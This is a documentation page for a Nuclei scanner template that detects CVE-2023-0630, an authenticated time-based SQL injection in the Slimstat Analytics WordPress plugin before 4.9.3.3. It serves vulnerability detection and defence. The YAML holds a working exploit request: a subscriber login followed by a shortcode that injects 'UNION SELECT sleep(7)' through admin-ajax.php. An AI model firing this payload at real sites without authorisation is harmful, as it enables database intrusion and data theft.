Skip to content
Nuclei Templates

Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection

ID: CVE-2023-0630

Severity: high

Author: DhiyaneshDK

Tags: time-based-sqli,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated

Description

Section titled “Description”

The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.

YAML Source

Section titled “YAML Source”
id: CVE-2023-0630


info:
  name: Slimstat Analytics < 4.9.3.3 Subscriber - SQL Injection
  author: DhiyaneshDK
  severity: high
  description: |
    The Slimstat Analytics WordPress plugin before 4.9.3.3 does not prevent subscribers from rendering shortcodes that concatenates attributes directly into an SQL query.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized access to the WordPress database, potentially exposing sensitive information.
  remediation: Fixed in version 4.9.3.3
  reference:
    - https://wpscan.com/vulnerability/b82bdd02-b699-4527-86cc-d60b56ab0c55
    - https://wordpress.org/plugins/wp-slimstat
    - https://nvd.nist.gov/vuln/detail/CVE-2023-0630
    - https://github.com/nomi-sec/PoC-in-GitHub
    - https://github.com/RandomRobbieBF/CVE-2023-0630
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-0630
    cwe-id: CWE-89
    epss-score: 0.09092
    epss-percentile: 0.94617
    cpe: cpe:2.3:a:wp-slimstat:slimstat_analytics:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: wp-slimstat
    product: slimstat_analytics
    framework: wordpress
  tags: time-based-sqli,cve2023,cve,wpscan,wp-slimstat,wp,wp-plugin,sqli,wordpress,authenticated


http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        @timeout: 20s
        POST /wp-admin/admin-ajax.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        action=parse-media-shortcode&shortcode=[slimstat f="count" w="author"]WHERE:1 UNION SELECT sleep(7)-- a[/slimstat]


    matchers:
      - type: dsl
        dsl:
          - 'duration_2>=7'
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "application/json")'
          - 'contains(body_2, "audioShortcodeLibrary")'
        condition: and
# digest: 480a00453043021f3cea31f6c903adaf592eee50cf9b362931e50098cb5d3a1e897b2f82c287b402203b7dd5ff8ce5153006a998b211fc04b6d634ea160ad499682f10a0bb7a629a64:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-0630.yaml"

View on Github